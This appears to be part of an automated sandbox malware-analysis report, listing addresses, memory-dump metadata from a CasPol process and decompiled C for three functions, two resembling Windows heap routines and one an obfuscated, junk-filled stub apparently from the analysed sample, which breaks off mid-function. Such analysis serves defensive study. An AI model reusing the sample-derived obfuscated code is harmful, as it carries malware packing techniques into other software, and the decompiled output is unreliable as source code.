                                                                0x0165ecd5
                                                                0x0165ecd5
                                                                0x0165ecd5
                                                                0x0165ecd8
                                                                0x0165ecda
                                                                0x0165ece4
                                                                0x00000000
                                                                0x00000000
                                                                0x0165ecea
                                                                0x0165eced
                                                                0x0165ecf0
                                                                0x0165ecf2
                                                                0x0165ecfb
                                                                0x0165ecfe
                                                                0x0165ed01
                                                                0x0165ed06
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165ed06
                                                                0x0169b7ae
                                                                0x0169b7b1
                                                                0x0169b7b7
                                                                0x00000000
                                                                0x00000000
                                                                0x0169b7b9
                                                                0x0169b7bb
                                                                0x0165ed08
                                                                0x0165ed08
                                                                0x0165ed0c
                                                                0x0165ed0c
                                                                0x00000000
                                                                0x0165ec60
                                                                0x0165ec62
                                                                0x0165ed0f
                                                                0x0165ed0f
                                                                0x00000000
                                                                0x0165ed0f
                                                                0x0165ec68
                                                                0x0165ec6c
                                                                0x0165ec6f
                                                                0x0165ec75
                                                                0x0165ec0d
                                                                0x0165ec0d
                                                                0x0165ec18
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165ec18
                                                                0x0165ec77
                                                                0x0165ec79
                                                                0x0165ec79
                                                                0x00000000
                                                                0x0165ec68
                                                                0x0165ec5e
                                                                0x0165ec3e
                                                                0x0165ebfd
                                                                0x0165ec02
                                                                0x0169b701
                                                                0x0169b70c
                                                                0x0169b71b
                                                                0x0169b71d
                                                                0x0169b71d
                                                                0x00000000
                                                                0x0169b70c
                                                                0x0165ec08
                                                                0x0165ec0a
                                                                0x00000000
                                                                0x0165ec0a
                                                                0x0165ebf5
                                                                0x0165ebf5

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                • Instruction ID: c3410ea2b5707f35171d8f8c05190955022b6e5e829d188031d61bc2895ff60f
                                                                • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                • Instruction Fuzzy Hash: 62815632A082568FEF254E6CDCC167DFB59EF52210F2C42BADD528F341C226DA46D392
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164AB40 Relevance: .2, Instructions: 240COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 91%
                                                                			E0164AB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t88;
				unsigned int _t97;
				unsigned int _t99;
				unsigned int _t105;
				unsigned int _t107;
				intOrPtr* _t111;
				unsigned int _t118;
				void* _t123;
				intOrPtr _t127;
				signed int _t128;
				void* _t131;
				signed char _t136;
				signed char _t141;
				signed char _t146;
				signed int _t151;
				signed int _t153;
				unsigned int _t155;
				intOrPtr _t158;
				void* _t164;
				signed short _t167;
				void* _t171;
				void* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				signed short _t180;
				signed short _t182;

				_t149 = __ecx;
				_t111 =  *((intOrPtr*)(__edx + 0x18));
				_v24 = __edx;
				_t69 =  *((intOrPtr*)(_t111 + 4));
				_t158 = _a12;
				_v8 = __ecx;
				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
				_v28 = _t111;
				if(_t111 == _t69) {
					L7:
					_t70 = _t111;
					goto L8;
				} else {
					_t127 = _a4;
					if(_t127 == 0) {
						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
					} else {
						_t182 =  *(_t69 - 8);
						_v20 = _t69 + 0xfffffff8;
						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
							_t105 =  *(__ecx + 0x50) ^ _t182;
							_v12 = _t105;
							_t107 = _v12;
							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
							if(_t107 >> 0x18 != _t146) {
								_push(_t146);
								E016EA80D(__ecx, _v20, 0, 0);
								_t149 = _v8;
							}
							_t182 = _v12;
							_t127 = _a4;
						}
						_t171 = _t158 - (_t182 & 0x0000ffff);
					}
					if(_t171 <= 0) {
						_t71 =  *_t111;
						if(_t127 == 0) {
							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
						} else {
							_t180 =  *(_t71 - 8);
							_v20 = _t71 + 0xfffffff8;
							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
								_t97 =  *(_t149 + 0x50) ^ _t180;
								_v12 = _t97;
								_t99 = _v12;
								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
								if(_t99 >> 0x18 != _t141) {
									_push(_t141);
									E016EA80D(_t149, _v20, 0, 0);
									_t149 = _v8;
								}
								_t180 = _v12;
								_t127 = _a4;
							}
							_t173 = _t158 - (_t180 & 0x0000ffff);
						}
						if(_t173 <= 0) {
							return  *_t111;
						} else {
							_t175 = _v24;
							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
								_t128 = _v16;
								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
								_t151 = _t128 >> 5;
								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
								_t74 = _t73 + _t151 * 4;
								if(1 == 0) {
									while(_t151 <= _t164) {
										_t118 =  *(_t74 + 4);
										_t74 = _t74 + 4;
										_t151 = _t151 + 1;
										if(_t118 == 0) {
											continue;
										} else {
											goto L28;
										}
										goto L51;
									}
									if(_t118 != 0) {
										goto L28;
									} else {
										goto L40;
									}
								} else {
									L28:
									if(_t118 == 0) {
										_t77 = _t118 >> 0x00000010 & 0x000000ff;
										if(_t77 != 0) {
											_t79 = ( *(_t77 + 0x16084d0) & 0x000000ff) + 0x10;
										} else {
											_t57 = (_t118 >> 0x18) + 0x16084d0; // 0x10008
											_t79 = ( *_t57 & 0x000000ff) + 0x18;
										}
									} else {
										_t82 = _t118 & 0x000000ff;
										if(_t118 == 0) {
											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x16084d0) & 0x000000ff) + 8;
										} else {
											_t79 =  *(_t82 + 0x16084d0) & 0x000000ff;
										}
									}
									_t153 = (_t151 << 5) + _t79;
									if( *((intOrPtr*)(_t175 + 8)) != 0) {
										_t153 = _t153 + _t153;
									}
									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
									L8:
									return _t70;
								}
							} else {
								_t88 = _v16;
								if( *((intOrPtr*)(_t175 + 8)) != 0) {
									_t88 = _t88 + _t88;
								}
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
								if(_t111 == _t178) {
									L40:
									return 0;
								} else {
									do {
										if(_t127 == 0) {
											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
										} else {
											_t167 =  *(_t178 - 8);
											_t123 = _t178 - 8;
											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
												_t155 =  *(_t149 + 0x50) ^ _t167;
												_t167 = _t155;
												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
												_t149 = _v8;
												if(_t155 >> 0x18 != _t136) {
													_push(_t136);
													E016EA80D(_t149, _t123, 0, 0);
													_t149 = _v8;
												}
											}
											_t111 = _v28;
											_t158 = _a12;
											_t131 = _t158 - (_t167 & 0x0000ffff);
										}
										if(_t131 <= 0) {
											return _t178;
										} else {
											goto L24;
										}
										goto L51;
										L24:
										_t178 =  *_t178;
										_t127 = _a4;
									} while (_t111 != _t178);
									goto L40;
								}
							}
						}
					} else {
						goto L7;
					}
				}
				L51:
			}











































                                                                0x0164ab4a
                                                                0x0164ab51
                                                                0x0164ab57
                                                                0x0164ab5b
                                                                0x0164ab5e
                                                                0x0164ab61
                                                                0x0164ab64
                                                                0x0164ab67
                                                                0x0164ab6c
                                                                0x0164abbb
                                                                0x0164abbb
                                                                0x00000000
                                                                0x0164ab6e
                                                                0x0164ab6e
                                                                0x0164ab73
                                                                0x0164ad70
                                                                0x0164ab79
                                                                0x0164ab79
                                                                0x0164ab83
                                                                0x0164ab86
                                                                0x0164ab8b
                                                                0x0164ab8f
                                                                0x0164ab9a
                                                                0x0164ab9d
                                                                0x0164aba4
                                                                0x0169242c
                                                                0x01692439
                                                                0x0169243e
                                                                0x0169243e
                                                                0x0164abaa
                                                                0x0164abad
                                                                0x0164abad
                                                                0x0164abb5
                                                                0x0164abb5
                                                                0x0164abb9
                                                                0x0164abc6
                                                                0x0164abca
                                                                0x0164ad7a
                                                                0x0164abd0
                                                                0x0164abd0
                                                                0x0164abda
                                                                0x0164abdd
                                                                0x0164abe2
                                                                0x0164abe6
                                                                0x0164abf1
                                                                0x0164abf4
                                                                0x0164abfb
                                                                0x01692446
                                                                0x01692453
                                                                0x01692458
                                                                0x01692458
                                                                0x0164ac01
                                                                0x0164ac04
                                                                0x0164ac04
                                                                0x0164ac0c
                                                                0x0164ac0c
                                                                0x0164ac10
                                                                0x0164ad6b
                                                                0x0164ac16
                                                                0x0164ac16
                                                                0x0164ac1c
                                                                0x0164aca7
                                                                0x0164acba
                                                                0x0164acbd
                                                                0x0164acc8
                                                                0x0164acc9
                                                                0x0164accc
                                                                0x0164accf
                                                                0x0164ad00
                                                                0x0164ad04
                                                                0x0164ad07
                                                                0x0164ad0a
                                                                0x0164ad0d
                                                                0x00000000
                                                                0x0164ad0f
                                                                0x00000000
                                                                0x0164ad0f
                                                                0x00000000
                                                                0x0164ad0d
                                                                0x0164ad40
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164acd1
                                                                0x0164acd1
                                                                0x0164acd4
                                                                0x0164ad16
                                                                0x0164ad1b
                                                                0x0164ad54
                                                                0x0164ad1d
                                                                0x0164ad20
                                                                0x0164ad27
                                                                0x0164ad27
                                                                0x0164acd6
                                                                0x0164acd6
                                                                0x0164acdb
                                                                0x0164ad39
                                                                0x0164acdd
                                                                0x0164acdd
                                                                0x0164acdd
                                                                0x0164acdb
                                                                0x0164ace7
                                                                0x0164aced
                                                                0x0169247f
                                                                0x0169247f
                                                                0x0164acf6
                                                                0x0164abbd
                                                                0x0164abc3
                                                                0x0164abc3
                                                                0x0164ac2b
                                                                0x0164ac2f
                                                                0x0164ac32
                                                                0x01692460
                                                                0x01692460
                                                                0x0164ac3b
                                                                0x0164ac40
                                                                0x0164ad42
                                                                0x0164ad4a
                                                                0x0164ac46
                                                                0x0164ac46
                                                                0x0164ac48
                                                                0x0164ad5b
                                                                0x0164ac4e
                                                                0x0164ac4e
                                                                0x0164ac51
                                                                0x0164ac58
                                                                0x0164ac5d
                                                                0x0164ac66
                                                                0x0164ac6d
                                                                0x0164ac74
                                                                0x0164ac77
                                                                0x01692467
                                                                0x01692472
                                                                0x01692477
                                                                0x01692477
                                                                0x0164ac77
                                                                0x0164ac7d
                                                                0x0164ac83
                                                                0x0164ac88
                                                                0x0164ac88
                                                                0x0164ac8c
                                                                0x0164aca4
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164ac8e
                                                                0x0164ac8e
                                                                0x0164ac90
                                                                0x0164ac93
                                                                0x00000000
                                                                0x0164ac46
                                                                0x0164ac40
                                                                0x0164ac1c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164abb9
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99eba84cbb387ec0c4f26967e3a393d9e672ac0bd4bfc0a7be42ac262f2d8531
                                                                • Instruction ID: 9ebc09d77b197fd8ccaeb699889c65830b2f493c9d52c73fd935b70012251b7b
                                                                • Opcode Fuzzy Hash: 99eba84cbb387ec0c4f26967e3a393d9e672ac0bd4bfc0a7be42ac262f2d8531
                                                                • Instruction Fuzzy Hash: EB81D132A40219ABEB24CF9DCC9477AB7F1EF84215F1A4299D9829F381D730ED45CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F25DD Relevance: .2, Instructions: 232COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E016F25DD(intOrPtr __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E016F2E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x1716110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x1716110; // 0x3951a168
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x1716110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E0166D340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E0166D0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E0163FFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x160ac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x160ac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x160ac00; // 0x6060706
					_t48 = _t123 + 0x160ac00; // 0x6070708
					_t142 = _v16;
					if(E016F2FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E01642280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x1716110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x1716110; // 0x3951a168
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x1716110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x1716110 ^ _t168) & 0x7fff0000;
					}
					E016F241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}











































                                                                0x016f25e6
                                                                0x016f25f6
                                                                0x016f25fb
                                                                0x016f25fe
                                                                0x016f2603
                                                                0x016f2610
                                                                0x016f2611
                                                                0x016f2613
                                                                0x016f262f
                                                                0x016f2634
                                                                0x016f2639
                                                                0x016f2641
                                                                0x016f2643
                                                                0x016f2646
                                                                0x016f2648
                                                                0x016f2649
                                                                0x016f2649
                                                                0x016f2649
                                                                0x016f2646
                                                                0x016f263b
                                                                0x016f263b
                                                                0x016f263d
                                                                0x016f263d
                                                                0x016f2639
                                                                0x016f2651
                                                                0x016f2653
                                                                0x016f2655
                                                                0x016f2657
                                                                0x016f265c
                                                                0x016f2668
                                                                0x016f266a
                                                                0x016f2675
                                                                0x016f267c
                                                                0x016f2680
                                                                0x016f2684
                                                                0x016f2687
                                                                0x016f2692
                                                                0x016f2695
                                                                0x016f2698
                                                                0x016f269d
                                                                0x016f26a2
                                                                0x016f26a4
                                                                0x016f26a4
                                                                0x016f26a8
                                                                0x016f26b2
                                                                0x016f26c0
                                                                0x016f26c6
                                                                0x016f26c9
                                                                0x016f26d1
                                                                0x016f26d4
                                                                0x016f26e2
                                                                0x016f26ea
                                                                0x016f26ed
                                                                0x016f26f1
                                                                0x016f26f6
                                                                0x016f26f9
                                                                0x016f2707
                                                                0x016f270d
                                                                0x016f2710
                                                                0x016f2713
                                                                0x016f2718
                                                                0x016f271d
                                                                0x016f271d
                                                                0x016f2722
                                                                0x016f2750
                                                                0x016f2758
                                                                0x016f275d
                                                                0x016f2760
                                                                0x016f2766
                                                                0x016f2769
                                                                0x016f276e
                                                                0x016f2771
                                                                0x016f2777
                                                                0x016f277d
                                                                0x016f2783
                                                                0x016f2791
                                                                0x016f27a7
                                                                0x016f27a9
                                                                0x016f27ab
                                                                0x016f27ab
                                                                0x016f27b1
                                                                0x016f27b4
                                                                0x016f27b4
                                                                0x016f27bc
                                                                0x016f27bf
                                                                0x016f27c2
                                                                0x016f27c2
                                                                0x016f27db
                                                                0x016f27df
                                                                0x016f27e5
                                                                0x016f27e8
                                                                0x016f27f0
                                                                0x016f27ff
                                                                0x016f27ff
                                                                0x016f27f2
                                                                0x016f27f4
                                                                0x016f27f4
                                                                0x016f281a
                                                                0x016f2824
                                                                0x016f2826
                                                                0x016f2834
                                                                0x016f2843
                                                                0x016f2858
                                                                0x016f2858
                                                                0x016f2866
                                                                0x016f2866
                                                                0x016f2873

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 602e66201168d1b7853ad5749509287bf87ba40b680fa529211c9781297ea828
                                                                • Instruction ID: 0ce115072b5f8a34c77b63cb785528032665536f576e51a1fece13bcb454ba22
                                                                • Opcode Fuzzy Hash: 602e66201168d1b7853ad5749509287bf87ba40b680fa529211c9781297ea828
                                                                • Instruction Fuzzy Hash: F481C172A101158BCB19CF79CCA16BABBE1FF88210B1A82ADE955DB395DB34D901CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00421B68 Relevance: .2, Instructions: 229COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 64%
                                                                			E00421B68(signed int __eax, signed int __ebx, intOrPtr __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t46;
				signed int _t47;
				signed int _t48;
				intOrPtr _t50;
				signed char _t52;
				signed int _t54;
				signed int _t55;

				_t54 = __esi;
				_t52 = __edx;
				_t50 = __ecx;
				_t48 = __ebx;
				asm("sbb eax, 0x4eeb4b34");
				asm("rol dword [eax-0x327fd322], 0xa8");
				 *0x16c5c8ef =  *0x16c5c8ef + __ebx;
				_t55 =  *0x5289cc67;
				_t46 = __eax &  *0x4710d720;
				 *0xd73167e2 = __edx;
				 *0x7565f133 =  *0x7565f133 | _t46;
				asm("rcl dword [0x68649dd8], 0x53");
				_push(__ecx);
				_t47 = _t46 + 0x3d74df92;
				if(( *0x598113cb & __edx) >= 0) {
					L1:
					asm("sbb [0xc36efb09], edx");
					asm("adc [0x767ba821], ebx");
					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
					_t47 = _t47 & 0x0000000c;
					_t55 = (_t55 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
					asm("sbb ebp, [0x8771e3b]");
					_push(_t55);
					_t54 = _t54 &  *0x912dd0fb;
					_t52 = _t52 & 0x00000020;
					asm("rol byte [0xf89935f2], 0x22");
					asm("rol dword [0xfbe9540d], 0x6c");
					 *0x9459ca0a = _t50;
					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
					asm("adc bl, [0xc320ed3c]");
					asm("scasb");
					_t50 =  *0x9459ca0a - 1;
					 *0xaab74829 =  *0xaab74829 ^ _t47;
					asm("rcl dword [0x7f106817], 0x35");
					asm("adc eax, [0x9d56ea15]");
					_t48 = _t48 +  *0x5ceec7ba &  *0x3b22d9f7;
					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
					goto L1;
				}
				__ebx = __ebx + 0x4d8c6179;
				 *0x37f7cf81 =  *0x37f7cf81 - __eax;
				 *0xb9a68cc6 =  *0xb9a68cc6 << 0xea;
				_push(__esp);
				__esp = __esp ^ 0xeb6a169d;
				__eflags =  *0xfe48edf & __ebx;
				if(( *0xfe48edf & __ebx) == 0) {
					goto L1;
				}
				__esp = __esp & 0x4b5b4f74;
				asm("scasb");
				asm("sbb [0xf34d368c], edi");
				 *0xdd804932 =  *0xdd804932 >> 0;
				 *0xa4852eee =  *0xa4852eee + __edi;
				 *0x4f56cb39 =  *0x4f56cb39 << 0xbd;
				_push(__esp);
				asm("adc edi, [0x4b66b867]");
				__edi & 0xc70faff4 =  *0x5726cbf2 & __bh;
				__edx = __edx + 1;
				asm("scasb");
				 *0x755e6536 =  *0x755e6536 - __esp;
				asm("rcl dword [0x91febd67], 0x5d");
				asm("rcr byte [0x43a84b7], 0x21");
				asm("ror dword [0xe4a793d], 0x73");
				__eflags =  *0x9ab4493e & __edx;
				 *0x5b4e7526 =  *0x5b4e7526 ^ __edi;
				__esp = 0x1e9c31c2;
				__esp = 0x1e9c31c2 ^  *0x52a2e0bc;
				asm("scasd");
				asm("lodsd");
				asm("rol byte [0x94b6f6ca], 0x25");
				 *0xa79cd09f & __edx =  *0xb5279eca - __ch;
				 *0x7ed032e5 =  *0x7ed032e5 << 0x61;
				__eflags =  *0xa5cf1060 * 0x5e2c -  *0xef866d3d;
				if( *0xa5cf1060 * 0x5e2c >=  *0xef866d3d) {
					goto L1;
				}
				__ecx =  *0xb33457d * 0x132b;
				__esp =  *0x4a089969 * 0xfdd6;
				__ecx =  *0xb33457d * 0x132b -  *0xad50b9cf;
				__ch =  *0x11f5d332;
				__edx = __edx & 0x8a020536;
				asm("rol byte [0x5f88c84], 0x56");
				 *0x846f74f2 =  *0x846f74f2 - __dl;
				__eflags =  *0x846f74f2;
				__edi = 0x60ca05f8;
				if( *0x846f74f2 != 0) {
					goto L1;
				}
				__eflags = __esi -  *0xca05f87b;
				asm("adc esi, [0xf88f593f]");
				__esp =  *0x5530ca05;
				__ecx =  *0xa05f88d;
				if(__esi >=  *0xca05f87b) {
					goto L1;
				}
				 *0xf87d6171 =  *0xf87d6171 << 0x31;
				__eax = __eax -  *0x1e02f703;
				 *0x62c20b04 =  *0x62c20b04 ^ __al;
				__dl = __dl & 0x000000f9;
				__eflags =  *0x85a104f9 & __al;
				__edx = __edx +  *0xa204f96f;
				 *0x5f9718c & __edx =  *0x713a183d - __edi;
				__ebx = __ebx |  *0x485105f8;
				__eflags = __ebx;
				if(__ebx != 0) {
					goto L1;
				}
				 *0x8c05f87b =  *0x8c05f87b - __esi;
				__esi = __esi - 1;
				__eflags = __esi;
				_push(__esp);
				if(__esi >= 0) {
					goto L1;
				}
				__ebx = __ebx |  *0xc907f879;
				 *0x7b490cd2 & __bh =  *0xb3073389 & __edx;
				asm("lodsd");
				__edi = __edi & 0x876e1ece;
				__eflags =  *0x34900733 & __ebx;
				asm("adc [0x8d7818d5], edx");
				__edi = __edi &  *0x31990733;
				__bl = __bl ^ 0x000000c9;
				 *0x339575ff = __ecx;
				__eflags = __bl & 0x00000008;
				if((__bl & 0x00000008) != 0) {
					goto L1;
				}
				__edi = __edi +  *0x6a57407b;
				__eflags = __edi;
				if(__edi != 0) {
					goto L1;
				}
				__eflags =  *0xfb368575 & __ebx;
				__edi =  *0x645ed711;
				asm("ror dword [0xa2fd62c8], 0x46");
				 *0xf94a5b17 =  *0xf94a5b17 >> 0xbc;
				__edi =  *0x645ed711 | 0x8eeac82e;
				asm("adc al, [0x691407c6]");
				__bh = __bh -  *0xff3a12c;
				asm("sbb ch, [0x4cf2d7b6]");
				 *0x2bb3899b =  *0x2bb3899b & __ebx;
				asm("rcl dword [0x12a35365], 0x54");
				 *0x6a3d55c8 =  *0x6a3d55c8 >> 0x89;
				__edi = ( *0x645ed711 | 0x8eeac82e) +  *0xde983ecd;
				__eflags = __bl & 0x0000002c;
				__edi = ( *0x645ed711 | 0x8eeac82e) +  *0xde983ecd + 0xa2192c1f;
				asm("adc [0xdcd76ec6], bl");
				 *0x96b50b34 =  *0x96b50b34 ^ __ch;
				asm("adc bh, 0xa8");
				__esi = __esi & 0x49eddfc5;
				 *0x753543e1 =  *0x753543e1 | __dl;
				_push( *0x37c42c06);
				asm("movsw");
				__esp =  *0x580c4460 * 0x30d7;
				__eflags = __edx -  *0x80e72481;
				__esi = __esi -  *0x6d06f40d;
				__eflags = __esi;
				if(__esi > 0) {
					goto L1;
				}
				asm("adc edx, [0x3a520777]");
				__bh = __bh &  *0xcab003e5;
				_t36 = __ebx;
				__ebx =  *0x21e11633;
				 *0x21e11633 = _t36;
				_pop( *0x1e86ea9f);
				asm("adc edi, 0xce5d00bc");
				__edx = __edx +  *0x7bce6198;
				 *0x27d00fda =  *0x27d00fda >> 0x8a;
				__ecx = __ecx +  *0x14fb50cd;
				asm("sbb [0xb684e311], edx");
				__ch = __ch ^ 0x000000e1;
				 *0x8e6142b1 =  *0x8e6142b1 >> 0x5a;
				__eflags =  *0x485a289 & __ecx;
				asm("adc esp, 0xb636bbc");
				 *0x31091c07 =  *0x31091c07 << 0x7b;
				asm("adc dl, 0xd7");
				_push(__esp);
				asm("sbb eax, [0x16b88c03]");
				 *0x359a40a =  *0x359a40a + __dl;
				__eflags =  *0x359a40a;
				asm("rcl dword [0x3d21200e], 0x59");
				if( *0x359a40a > 0) {
					goto L1;
				}
				asm("adc [0xcc63a277], eax");
				asm("ror byte [0xdc371d82], 0x1c");
				__edi = __edi - 0x8a3f2829;
				__dl = __dl & 0x00000010;
				 *0x3c13fb25 =  *0x3c13fb25 - 0x733cbcda;
				__edi =  *0x91d5846b * 0x89a3;
				__ecx = __ecx + 1;
				__eflags = __ecx;
				if(__ecx >= 0) {
					goto L1;
				}
				__edx = __edx ^  *0xc812f879;
				__eflags = __edx;
				 *0xc5dd22dd = __esp;
				_t39 = __edx;
				__edx =  *0x92790ad9;
				 *0x92790ad9 = _t39;
				if(__eflags < 0) {
					goto L1;
				}
				__esi =  *0x122a067c * 0x5fed;
				_pop(__edx);
